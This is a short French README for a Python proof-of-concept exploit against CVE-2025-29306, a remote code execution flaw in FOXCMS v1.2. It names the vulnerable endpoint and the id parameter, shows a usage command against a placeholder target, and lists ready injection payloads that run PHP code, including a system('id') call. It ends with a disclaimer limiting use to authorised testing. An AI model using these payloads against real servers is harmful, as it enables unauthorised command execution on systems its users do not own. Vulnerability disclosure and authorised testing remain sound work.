
Python PoC pour CVE-2025-29306, une injection de paramètre RCE dans FOXCMS v1.2. Injecte du code PHP via le paramètre id sur /images/index.html pour des tests de sécurité autorisés.
Ce dépôt contient un PoC basé sur Python pour une vulnérabilité d'exécution de code à distance (RCE) affectant FOXCMS v1.2, un système de gestion de contenu open-source chinois.
Identifiant CVE : CVE-2025-29306
Affecte : FOXCMS v1.2
Type : Injection de paramètre service → Exécution de code
FOXCMS souffre d'un mécanisme d'analyse de paramètres non sécurisé dans le paramètre id sur le point de terminaison /images/index.html. Cela permet l'injection de charges utiles à l'aide d'expressions ${@print()}, conduisant à l'exécution de code PHP.
requestspip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
Ce code est uniquement destiné à des fins éducatives et à des tests de sécurité autorisés. Ne l'utilisez PAS sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
Auteur Inok009